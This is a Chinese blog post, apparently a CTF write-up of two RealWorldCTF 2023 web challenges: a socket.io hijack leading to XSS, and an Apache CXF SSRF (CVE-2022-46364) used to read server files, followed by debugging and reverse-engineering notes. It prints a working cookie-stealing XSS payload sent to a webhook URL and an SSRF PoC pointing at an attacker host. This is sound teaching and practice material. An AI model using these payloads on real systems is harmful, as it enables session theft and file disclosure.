<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","width":300,"display":"post","padding":18,"offset":12,"scrollpercent":true,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="又是一年一度的RWCTF，这次不算坐牢局，全是观光局。全程OBr3kapig的巨佬们秒题，文档能看懂个大概，思路有的还能跟上，但难耐大佬秒的速度太快了，呜呜呜。">
<meta property="og:type" content="article">
<meta property="og:title" content="rwctf2023">
<meta property="og:url" content="http://example.com/2023/01/13/rwctf2023/index.html">
<meta property="og:site_name" content="FYHSSGSS&#39;s blog">
<meta property="og:description" content="又是一年一度的RWCTF，这次不算坐牢局，全是观光局。全程OBr3kapig的巨佬们秒题，文档能看懂个大概，思路有的还能跟上，但难耐大佬秒的速度太快了，呜呜呜。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114180920906.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114145002144.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114175210578.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114184717827.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230113165222102.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114103407249.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114104152284.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230113170039476.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114105517878.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114115322403.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114115457982.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114120008814.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114120641568.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114110904054.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114120843139.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114121353359.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114121558416.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114121856168.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114122108102.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114122607549.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114123039364.png">
<meta property="og:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114123224160.png">
<meta property="article:published_time" content="2023-01-13T08:47:44.000Z">
<meta property="article:modified_time" content="2023-01-14T10:47:19.403Z">
<meta property="article:author" content="FYHSSGSS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/01/13/rwctf2023/assets/image-20230114180920906.png">

<link rel="canonical" href="http://example.com/2023/01/13/rwctf2023/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>rwctf2023 | FYHSSGSS's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">FYHSSGSS's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-ctf">

    <a href="/categories/CTF" rel="section"><i class="fa fa-flag fa-fw"></i>CTF</a>

  </li>
        <li class="menu-item menu-item-acm">

    <a href="/categories/ACM" rel="section"><i class="fa fa-code fa-fw"></i>ACM</a>

  </li>
        <li class="menu-item menu-item-school">

    <a href="/categories/school" rel="section"><i class="fa fa-book fa-fw"></i>school</a>

  </li>
        <li class="menu-item menu-item-life">

    <a href="/categories/life" rel="section"><i class="fa fa-film fa-fw"></i>life</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/01/13/rwctf2023/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/saiki.jpg">
      <meta itemprop="name" content="FYHSSGSS">
      <meta itemprop="description" content="Do you like what you see">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="FYHSSGSS's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          rwctf2023
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-01-13 16:47:44" itemprop="dateCreated datePublished" datetime="2023-01-13T16:47:44+08:00">2023-01-13</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-01-14 18:47:19" itemprop="dateModified" datetime="2023-01-14T18:47:19+08:00">2023-01-14</time>
              </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>9.2k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>8 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>又是一年一度的RWCTF，这次不算坐牢局，全是观光局。全程OBr3kapig的巨佬们秒题，文档能看懂个大概，思路有的还能跟上，但难耐大佬秒的速度太快了，呜呜呜。</p>
<span id="more"></span>
<h1 id="RealWorldCTF2023"><a href="#RealWorldCTF2023" class="headerlink" title="RealWorldCTF2023"></a>RealWorldCTF2023</h1><h2 id="ChatUWU"><a href="#ChatUWU" class="headerlink" title="ChatUWU"></a>ChatUWU</h2><p>比赛中解数最多的题，看完代码后思路瞬间跑偏，然后就被大哥秒了。</p>
<h3 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述"></a>题目描述</h3><p>xss题，实现了一个基于socket.io通信的聊天室，可控两个GET参数：<code>from</code>（你的昵称）和<code>text</code>（聊天内容）。存在两个房间，第一个房间<code>textContent</code>会将你的text原封不动放让去，也就是说只能发文字，第二个房间<code>DOMPurify</code>会对你的消息进行一个<code>DOMPurify.sanitize</code>的标签渲染，也就意味着我们可以发一些图片甚至多媒体文件在聊天室了。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">socket.on(<span class="string">&#x27;msg&#x27;</span>, <span class="function"><span class="params">msg</span> =&gt;</span> &#123;</span><br><span class="line">    msg.from = <span class="built_in">String</span>(msg.from).substr(<span class="number">0</span>, <span class="number">16</span>)</span><br><span class="line">    msg.text = <span class="built_in">String</span>(msg.text).substr(<span class="number">0</span>, <span class="number">140</span>)</span><br><span class="line">    <span class="keyword">if</span> (room === <span class="string">&#x27;DOMPurify&#x27;</span>) &#123;</span><br><span class="line">        io.to(room).emit(<span class="string">&#x27;msg&#x27;</span>, &#123;</span><br><span class="line">            <span class="attr">from</span>: DOMPurify.sanitize(msg.from),</span><br><span class="line">            <span class="attr">text</span>: DOMPurify.sanitize(msg.text),</span><br><span class="line">            <span class="attr">isHtml</span>: <span class="literal">true</span></span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>看到这块我直接说，是不是只要绕过这个DOMPurify的渲染，使得能执行js代码就完事了？所以去审DOMPurify就可以了。队友表示不太像是硬刚这个库，可以看看socket.io，但一时间我看<code>index.js</code>和socket也没啥关系啊，于是就跑偏了。</p>
<p>但实际上我忽略了一个很大的点，就是没有去看html里面的js代码。因为之前做题觉得前端都是可以随便改的所以不会去关注前端的代码，但是这是一道XSS题，也就是bot去点我们的url的时候也会强制执行前端的js代码，这里可能藏有和题目有关的信息。</p>
<h3 id="解法"><a href="#解法" class="headerlink" title="解法"></a>解法</h3><p>我们来看<code>index.js</code>，其中一段代码让我感到很困惑，这个向/location.search是啥意思啊</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> socket = io(<span class="string">`/<span class="subst">$&#123;location.search&#125;</span>`</span>),</span><br><span class="line">   messages = <span class="built_in">document</span>.getElementById(<span class="string">&#x27;messages&#x27;</span>),</span><br><span class="line">   form = <span class="built_in">document</span>.getElementById(<span class="string">&#x27;form&#x27;</span>),</span><br><span class="line">   input = <span class="built_in">document</span>.getElementById(<span class="string">&#x27;input&#x27;</span>);</span><br></pre></td></tr></table></figure>
<p>其实原因是不太理解socket.io的客户端api导致的，先简单看了一下：<a target="_blank" rel="noopener" href="https://www.w3cschool.cn/socket/socket-k49j2eia.html">socket.io 客户端 API_w3cschool</a></p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114180920906.png" alt="image-20230114180920906"></p>
<p>默认是连向当前浏览器页面所处的url，也就是我们的浏览器主动和靶机进行socket连接（好像是废话）。所以在这里我们就产生了尝试劫持socket连接的想法。</p>
<p>然后大佬就能通过黑盒测出来<code>/params@host</code>会解析到<code>host</code>字段（学不来学不来）</p>
<p>比如测试一下：<a target="_blank" rel="noopener" href="http://47.254.28.30:58000/?room=DOMPurify&amp;nickname=123@****:8080">http://47.254.28.30:58000/?room=DOMPurify&amp;nickname=123@****:8080</a></p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114145002144.png" alt="image-20230114145002144"></p>
<p>我们便可利用这个漏洞劫持解析到我们自己的服务器，发送<code>isHtml=True</code>和一段能执行js代码的标签(显然就是Img了)给浏览器，这样浏览器就会将其理解为innerHTML并进行渲染解析。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">socket.on(<span class="string">&#x27;msg&#x27;</span>, <span class="function"><span class="keyword">function</span> (<span class="params">msg</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">let</span> item = <span class="built_in">document</span>.createElement(<span class="string">&#x27;li&#x27;</span>),</span><br><span class="line">            msgtext = <span class="string">`[<span class="subst">$&#123;<span class="keyword">new</span> <span class="built_in">Date</span>().toLocaleTimeString()&#125;</span>] <span class="subst">$&#123;msg.<span class="keyword">from</span>&#125;</span>: <span class="subst">$&#123;msg.text&#125;</span>`</span>;</span><br><span class="line">        room === <span class="string">&#x27;DOMPurify&#x27;</span> &amp;&amp; msg.isHtml ? item.innerHTML = msgtext : item.textContent = msgtext;</span><br><span class="line">        messages.appendChild(item);</span><br><span class="line">        <span class="built_in">window</span>.scrollTo(<span class="number">0</span>, <span class="built_in">document</span>.body.scrollHeight);</span><br><span class="line">    &#125;);</span><br></pre></td></tr></table></figure>
<p>魔改一下题目的js,在自己服务器上vps起个node服务，负责建立socket连接。<strong>注意IO要改成<code>origin: &#39;*&#39;</code>，否则因为CSP策略无法跨域访问。</strong></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> app = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>)();</span><br><span class="line"><span class="keyword">const</span> http = <span class="built_in">require</span>(<span class="string">&#x27;http&#x27;</span>).Server(app);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> io = <span class="built_in">require</span>(<span class="string">&#x27;socket.io&#x27;</span>)(http,&#123;</span><br><span class="line">	<span class="attr">cors</span>: &#123;</span><br><span class="line">		<span class="attr">origin</span>: <span class="string">&#x27;*&#x27;</span>,</span><br><span class="line">		<span class="attr">methods</span>: [<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span><br><span class="line">	&#125;</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> hostname = process.env.HOSTNAME || <span class="string">&#x27;0.0.0.0&#x27;</span>;</span><br><span class="line"><span class="keyword">const</span> port = process.env.PORT || <span class="number">8000</span>;</span><br><span class="line"><span class="keyword">const</span> rooms = [<span class="string">&#x27;textContent&#x27;</span>, <span class="string">&#x27;DOMPurify&#x27;</span>];</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app.get(<span class="string">&#x27;/&#x27;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    res.send(<span class="string">&#x27;123&#x27;</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">io.on(<span class="string">&#x27;connection&#x27;</span>, <span class="function">(<span class="params">socket</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="built_in">console</span>.log(socket.handshake.query);</span><br><span class="line">    socket.emit(<span class="string">&#x27;msg&#x27;</span>, &#123;</span><br><span class="line">        <span class="attr">from</span>: <span class="string">&#x27;&lt;img src onerror=&quot;(new Image).src=`https://webhook.site/4c4ab860-9453-4c87-a999-14855daaae78?$&#123;document.cookie&#125;`&quot;&gt;&#x27;</span>,</span><br><span class="line">        <span class="attr">text</span>: <span class="string">&#x27;&lt;img src onerror=&quot;(new Image).src=`https://webhook.site/4c4ab860-9453-4c87-a999-14855daaae78?$&#123;document.cookie&#125;`&quot;&gt;&#x27;</span>,</span><br><span class="line">                <span class="attr">isHtml</span>: <span class="literal">true</span></span><br><span class="line">    &#125;);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">http.listen(port, hostname, <span class="function">() =&gt;</span> &#123;</span><br><span class="line">    <span class="built_in">console</span>.log(<span class="string">`ChatUWU server running at http://<span class="subst">$&#123;hostname&#125;</span>:<span class="subst">$&#123;port&#125;</span>/`</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>如下。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114175210578.png" alt="image-20230114175210578"></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>这里其实有一个新的对象关注，那就是bot的前端环境，原先只是过分关心靶机会怎么样怎么样，这是这道题给我的新启示。</p>
<p>当然这道题最牛逼的还是黑盒测出来@解析bug，感觉这种问题应该很常见，大佬应该通过这种方式收获一连串CVE了吧。</p>
<p>关于@的解析歧义问题，想起来之前网鼎2020的一道SSRFme，那里就是curl和parse_url的解析在@这个字符上产生了歧义。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114184717827.png" alt="image-20230114184717827"></p>
<p>对前端题其实一直挺反感的，归根到底就是因为啥也不会，导致下一道the cult of 8 bit完全看不懂，还是得系统学一学。</p>
<h2 id="The-Dark-Portal"><a href="#The-Dark-Portal" class="headerlink" title="The Dark Portal"></a>The Dark Portal</h2><p>感觉这个题有点0ctf2022tomcat的ajp走私+幽灵猫组合洞的题，前半段是基于题目信息和黑盒打day。</p>
<p>首先访问题目会返回给我们一段wsdl，很好，我也不知道这是啥，简单搜搜是干啥的：</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7541#toc-1">浅析接口安全之WebService - 先知社区 (aliyun.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/hoojjack/p/6724659.html">Apache CXF 入门详解 - 想总结却停留不前？ - 博客园 (cnblogs.com)</a></p>
<p>Web服务(WebService)是一种<strong>跨语言</strong>和<strong>跨平台</strong>的远程调用(RPC)技术</p>
<p>SOAP = http协议 + XML数据格式</p>
</blockquote>
<p>所以说那个xml应该就是告诉我们这个题通过soap的传参方式，那是不是我还得学一下咋肉眼理解这个xml呢？无所谓，burp的插件wsdler会出手。可以看出，插件为我们自动翻译出了对应的请求包，我们只需要修改<code>arg0</code>字段里面的字符串即可实现传参。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230113165222102.png" alt="image-20230113165222102"></p>
<p>接下来就是找对应的day了。简单搜索了一下2022年关于apache cxf的CVE，最新的有两个：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.cvedetails.com/cve/CVE-2022-46364/">CVE-2022-46364</a> 一个SSRF的洞</li>
<li><a target="_blank" rel="noopener" href="https://www.cvedetails.com/cve/CVE-2022-46363/">CVE-2022-46363</a> 一个列目录的洞</li>
</ul>
<p>我们看<code>portal.jsp</code>里藏有一个这样的路由：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$(<span class="built_in">document</span>).ready(<span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">   $.ajax(&#123;</span><br><span class="line">       <span class="attr">url</span>: <span class="string">&quot;7he_d4rk_p0rt4l&quot;</span>,</span><br><span class="line">       <span class="attr">type</span>: <span class="string">&quot;GET&quot;</span>,</span><br><span class="line">       <span class="attr">success</span>: <span class="function"><span class="keyword">function</span> (<span class="params">data</span>) </span>&#123;</span><br><span class="line">            $(<span class="string">&quot;#voice&quot;</span>).html(data);</span><br><span class="line">       &#125;</span><br><span class="line">   &#125;)</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>我们可以利用的就是读到源码，看看这个<code>7he_d4rk_p0rt4l</code>在做什么，所以着手CVE-2022-46364。</p>
<h3 id="CVE-2022-46364"><a href="#CVE-2022-46364" class="headerlink" title="CVE-2022-46364"></a>CVE-2022-46364</h3><p>可以搜到以下资料：</p>
<blockquote>
<p>直接给的不完整poc：<a target="_blank" rel="noopener" href="https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHECXF-3168315">Server-side Request Forgery (SSRF) in org.apache.cxf:cxf-core | CVE-2022-46364 | Snyk</a></p>
<p>PR修改：<a target="_blank" rel="noopener" href="https://github.com/apache/cxf/pull/960">CXF-8706: CXF MTOM handler allow content injection by reta · Pull Request #960 · apache/cxf (github.com)</a></p>
<p>代码修改部分：<a target="_blank" rel="noopener" href="https://github.com/apache/cxf/commit/27813a0523e1b4ab7cccd980ef63d7249627f4e8">CXF-8706: CXF MTOM handler allow content injection (#960) · apache/cxf@27813a0 (github.com)</a></p>
</blockquote>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114103407249.png" alt="image-20230114103407249"></p>
<p>可以看到原来进到else分支就直接return一个URLDATASource了，现在修改了，新增了一个配置项<code>ATTACHMENT_XOP_FOLLOW_URLS_PROPERTY</code>,如果有才会去加载，否则就不会。可以确定这部分是在修补SSRF部分。</p>
<p>再结合刚才网站给出的POC：<code>&lt;stringvalue&gt;&lt;inc:Include href=&quot;http://attackers.site/exploit/payload&quot; xmlns:inc=&quot;http://www.w3.org/2004/08/xop/include&quot;/&gt;&lt;stringvalue&gt;</code>可以看出来，是xop中的include命名空间的href存在SSRF。当然这个poc是不完整的，我们去官方文档看看xop的具体用法：<a target="_blank" rel="noopener" href="https://www.ibm.com/docs/en/cics-ts/5.3?topic=data-mtomxop-soap">MTOM/XOP and SOAP - IBM Documentation</a></p>
<p>英文实在是太差，再加上本身对xml不太了解，读了两次才知道在干啥：MTOM/XOP是用来优化SOAP数据包大小的，原本附件要通过base64放在标签里，但有xop的引入，就可以通过boundary分割，把附件放在一个单独的块中，有一个唯一标识<code>content-id</code>，xop标签依旧在soap里，但xop的include的href就可以引用刚才的<code>content-id</code>，这样的效果就是发送的数据包的大小得到了优化，不必用base64编码传输了。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114104152284.png" alt="image-20230114104152284"></p>
<p>复现上述操作即可，将wsdler插件帮我们翻译的soap套在上面的请求头里（<code>content-type</code>也要改），修改href为我们的ssrf目标，可以任意文件读了，另外，java里面的file协议如果指定目录的话还能列目录，十分的方便，于是我们直接写脚本读取<code>file:///opt/tomcat/webapps/ROOT.war</code>。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230113170039476.png" alt="image-20230113170039476"></p>
<p>然后我们准备分析这个文件，看到了一个52K的class文件<code>DarkMagic.class</code>，拖到jd-gui里长这样：</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114105517878.png" alt="image-20230114105517878"></p>
<p>我表示理解不能，然后拖到idea里尝试反编译直接加载不出来，所以这个题到后半段就变成了逆向题。于是先要搭环境来动调。web手就用idea来动调了。</p>
<h3 id="IDEA搭建tomcat部署war包动调环境"><a href="#IDEA搭建tomcat部署war包动调环境" class="headerlink" title="IDEA搭建tomcat部署war包动调环境"></a>IDEA搭建tomcat部署war包动调环境</h3><p>简单写一下吧，本来挺简单一个事被idea坑了一个多小时。</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_57740280/article/details/124246962?spm=1001.2101.3001.6661.1&amp;utm_medium=distribute.pc_relevant_t0.none-task-blog-2~default~CTRLIST~Rate-1-124246962-blog-124291816.pc_relevant_recovery_v2&amp;depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2~default~CTRLIST~Rate-1-124246962-blog-124291816.pc_relevant_recovery_v2&amp;utm_relevant_index=1">(47条消息) idea 怎么导入war包，idea怎么打开war包，idea怎么导出一个war包_idea导入war包项目_我想要德玛西亚的博客-CSDN博客</a></p>
</blockquote>
<ul>
<li><p>新建项目的时候模板选用Web应用程序，应用程序服务器选择我们之前的tomcat服务器。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114115322403.png" alt="image-20230114115322403"></p>
</li>
<li><p>在这里我们可以在<code>Apache CXF XML Web Service</code>打上勾，这里打不打勾的区别在于项目的pom.xml会不会自动帮你把cxf相关依赖放上来，在这个题里，META-INF里的pom.xml直接复制即可，所以打不打勾无所谓。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114115457982.png" alt="image-20230114115457982"></p>
</li>
<li><p>之后项目会生成一个经典的<code>src</code>文件夹里面装着默认的serlvet以及index.jsp，一定要<strong>全部删掉</strong>，否则会影响后续部署。</p>
</li>
<li><p>把我们的war包解压，应该会解压成<code>META-INF</code>，<code>WEB-INF</code>以及其他jsp的文件，都放到一个文件夹里，就暂且称这个文件夹为<code>webapp</code>，然后扔到项目文件夹里，在项目结构的<code>module</code>里将<code>webapp</code>文件夹设为Web模块部署描述符，将<code>META-INF</code>里的<code>pom.xml</code>内容复制到这个项目根目录下的<code>pom.xml</code></p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114120008814.png" alt="image-20230114120008814"></p>
</li>
<li><p>然后理论上直接运行就可以了，IDEA会直接把webapp里的文件复制到<code>target</code>文件夹里，然后再通过tomcat一系列后续部署扔到tomcat上就可以运行了。</p>
</li>
</ul>
<p>原则上面就ok了，但实际中我一直是404，不太理解，经过各种折磨后发现了问题，在这里说一下是IDEA将<code>webapp</code>文件夹移到<code>target</code>文件夹时候文件命名出了一些bug，比如文件夹套娃，起了一个叫<code>web.xml</code>的文件夹（？？？ 迷惑行为），我在<code>target</code>文件夹下进行了手动调整才能成功跑通，十分的痛苦。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114120641568.png" alt="image-20230114120641568"></p>
<h3 id="结合jeb逆向分析"><a href="#结合jeb逆向分析" class="headerlink" title="结合jeb逆向分析"></a>结合jeb逆向分析</h3><p>s0uthwood说:”三分逆向，七分猜”。但是只看变量变化实在是太折磨了。真的没有那种nb一点的反编译的软件吗。然后在他的提醒下，打开了jeb，上一次打开还是一年前。一按tab，源码直接出现，jeb牛逼。这样就可以结合idea动调以及内存大概进行逆向分析了。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114110904054.png" alt="image-20230114110904054"></p>
<p>在<code>TheDarkPortal</code>的<code>doGet</code>函数下断点，为<code>DarkMagic</code>的入口，然后先看看有哪些变量。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114120843139.png" alt="image-20230114120843139"></p>
<p>看到了一堆静态变量，其中有一些我们能在前端回显到的中二英文，还有一些base64密文。</p>
<p>结合jeb的反编译源码分析有一堆label进行goto跳转，同时还有一堆println作为干扰，我们F7和shift+F8交替使用，快速切换到我们想要的部分。这里最抽象的就是函数名和变量名，由I,{和换行符组成。动调一部分进入了这里，能猜到这里应该是进行DES解密：</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114121353359.png" alt="image-20230114121353359"></p>
<p>一通解完之后我们注意到invoke函数的静态变量有一个String数组多出来一个元素：</p>
